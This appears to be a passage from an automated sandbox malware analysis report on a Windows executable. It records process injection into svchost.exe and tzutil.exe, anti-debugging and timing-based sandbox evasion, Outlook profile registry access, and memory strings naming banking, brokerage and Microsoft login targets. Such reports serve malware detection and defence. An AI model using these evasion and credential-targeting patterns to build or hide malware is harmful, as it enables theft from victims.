                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 01152-11-12-24.exeStatic file information: File size 1229312 > 1048576
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: tzutil.pdbGCTL source: svchost.exe, 00000007.00000003.1690915091.0000000003226000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1690729998.000000000321B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000003.1660608819.000000000162B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3116655155.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hKAQraLbCUKXj.exe, 0000000A.00000002.3114857736.000000000076E000.00000002.00000001.01000000.00000005.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790005654.000000000076E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 01152-11-12-24.exe, 00000000.00000003.1278771438.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 01152-11-12-24.exe, 00000000.00000003.1278637589.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1625128286.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1627148015.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1727279246.000000000373C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1724054396.000000000358F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 01152-11-12-24.exe, 00000000.00000003.1278771438.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 01152-11-12-24.exe, 00000000.00000003.1278637589.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1625128286.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1627148015.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 0000000B.00000003.1727279246.000000000373C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1724054396.000000000358F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3118417486.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790635169.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035A4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3118417486.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790635169.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035A4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: svchost.exe, 00000007.00000003.1690915091.0000000003226000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1690729998.000000000321B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000003.1660608819.000000000162B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3116655155.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                Source: 01152-11-12-24.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 01152-11-12-24.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 01152-11-12-24.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 01152-11-12-24.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 01152-11-12-24.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_008F4B37 LoadLibraryA,GetProcAddress, 0_2_008F4B37
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_00918945 push ecx; ret 0_2_00918958
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00416857 push esp; iretd 7_2_00416858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040D8D0 push esp; iretd 7_2_0040D8D1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004051E6 push esp; retf 7_2_00405205
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004032C0 push eax; ret 7_2_004032C2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040D352 push dword ptr [ebp-59622DFFh]; iretd 7_2_0040D358
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00414B13 pushad ; iretd 7_2_00414B78
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00414B85 pushad ; iretd 7_2_00414B78
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00414BA2 pushad ; iretd 7_2_00414B78
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004164A9 push es; retf 7_2_004164BD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00416505 push es; retf 7_2_004164BD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00413653 push ebx; retf 7_2_0041369C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0390225F pushad ; ret 7_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039027FA pushad ; ret 7_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039309AD push ecx; mov dword ptr [esp], ecx 7_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0390283D push eax; iretd 7_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03901368 push eax; iretd 7_2_03901369
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_038F225F pushad ; ret 11_2_038F27F9
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_038F27FA pushad ; ret 11_2_038F27F9
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_039209AD push ecx; mov dword ptr [esp], ecx 11_2_039209B6
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_038F283D push eax; iretd 11_2_038F2858
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_038F1368 push eax; iretd 11_2_038F1369
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030AC61B push cs; iretd 11_2_030AC632
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030AC5E4 push cs; iretd 11_2_030AC632
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030A3594 push esp; iretd 11_2_030A3595
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030A1850 pushad ; iretd 11_2_030A18B5
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030A18C2 pushad ; iretd 11_2_030A18B5
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030A18DF pushad ; iretd 11_2_030A18B5
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_03091F23 push esp; retf 11_2_03091F42
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030A9FAF push esi; ret 11_2_030A9FBB
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030A9FB0 push esi; ret 11_2_030A9FBB
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_008F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_008F48D7
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_00975376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00975376
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_00913187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00913187
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tzutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tzutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tzutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tzutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tzutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\01152-11-12-24.exe API/Special instruction interceptor: Address: 1416094
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\tzutil.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0397096E rdtsc 7_2_0397096E
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-105971
                Source: C:\Users\user\Desktop\01152-11-12-24.exe API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\tzutil.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 8096 Thread sleep count: 39 > 30
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 8096 Thread sleep time: -78000s >= -30000s
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe TID: 8116 Thread sleep time: -40000s >= -30000s
                Source: C:\Windows\SysWOW64\tzutil.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0095445A
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095C6D1 FindFirstFileW,FindClose, 0_2_0095C6D1
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0095C75C
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0095EF95
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0095F0F2
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0095F3F3
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_009537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_009537EF
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_00953B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00953B12
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0095BCBC
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030AC8A0 FindFirstFileW,FindNextFileW,FindClose, 11_2_030AC8A0
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_008F49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008F49A0
                Source: 745o5K385.11.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 745o5K385.11.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 745o5K385.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 745o5K385.11.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 745o5K385.11.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: 745o5K385.11.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: AMC password management pageVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 745o5K385.11.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 745o5K385.11.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 745o5K385.11.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 745o5K385.11.dr Binary or memory string: discord.comVMware20,11696492231f
                Source: hKAQraLbCUKXj.exe, 0000000C.00000002.3116899898.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                Source: firefox.exe, 00000010.00000002.2017884858.000001FDF5A2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 745o5K385.11.dr Binary or memory string: global block list test formVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: 745o5K385.11.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 745o5K385.11.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                Source: 745o5K385.11.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 745o5K385.11.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 745o5K385.11.dr Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: 745o5K385.11.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 745o5K385.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 745o5K385.11.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 745o5K385.11.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 745o5K385.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 745o5K385.11.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\tzutil.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0397096E rdtsc 7_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00417AA3 LdrLoadDll, 7_2_00417AA3
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_00963F09 BlockInput, 0_2_00963F09
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_008F3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_008F3B3A
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_00925A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00925A7C
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_008F4B37 LoadLibraryA,GetProcAddress, 0_2_008F4B37
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_01416360 mov eax, dword ptr fs:[00000030h] 0_2_01416360
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_01416300 mov eax, dword ptr fs:[00000030h] 0_2_01416300
                Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_01414CD0 mov eax, dword ptr fs:[00000030h] 0_2_01414CD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03928397 mov eax, dword ptr fs:[00000030h] 7_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03928397 mov eax, dword ptr fs:[00000030h] 7_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03928397 mov eax, dword ptr fs:[00000030h] 7_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0392E388 mov eax, dword ptr fs:[00000030h] 7_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0392E388 mov eax, dword ptr fs:[00000030h] 7_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0392E388 mov eax, dword ptr fs:[00000030h] 7_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0395438F mov eax, dword ptr fs:[00000030h] 7_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0395438F mov eax, dword ptr fs:[00000030h] 7_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039DE3DB mov eax, dword ptr fs:[00000030h] 7_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039DE3DB mov eax, dword ptr fs:[00000030h] 7_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039DE3DB mov ecx, dword ptr fs:[00000030h] 7_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039DE3DB mov eax, dword ptr fs:[00000030h] 7_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039D43D4 mov eax, dword ptr fs:[00000030h] 7_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039D43D4 mov eax, dword ptr fs:[00000030h] 7_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039EC3CD mov eax, dword ptr fs:[00000030h] 7_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039383C0 mov eax, dword ptr fs:[00000030h] 7_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039383C0 mov eax, dword ptr fs:[00000030h] 7_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039383C0 mov eax, dword ptr fs:[00000030h] 7_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039383C0 mov eax, dword ptr fs:[00000030h] 7_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039B63C0 mov eax, dword ptr fs:[00000030h] 7_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 7_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 7_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 7_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039663FF mov eax, dword ptr fs:[00000030h] 7_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h] 7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h] 7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h] 7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h] 7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h] 7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h] 7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h] 7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039403E9 mov eax, dword ptr fs:[00000030h] 7_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0392C310 mov ecx, dword ptr fs:[00000030h] 7_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03A08324 mov eax, dword ptr fs:[00000030h] 7_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03A08324 mov ecx, dword ptr fs:[00000030h] 7_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03A08324 mov eax, dword ptr fs:[00000030h] 7_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03A08324 mov eax, dword ptr fs:[00000030h] 7_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03950310 mov ecx, dword ptr fs:[00000030h] 7_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0396A30B mov eax, dword ptr fs:[00000030h] 7_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0396A30B mov eax, dword ptr fs:[00000030h] 7_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0396A30B mov eax, dword ptr fs:[00000030h] 7_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039B035C mov eax, dword ptr fs:[00000030h] 7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039B035C mov eax, dword ptr fs:[00000030h] 7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039B035C mov eax, dword ptr fs:[00000030h] 7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039B035C mov ecx, dword ptr fs:[00000030h] 7_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_039B035C mov eax, dword ptr fs:[00000030h] 7_2_039B035C
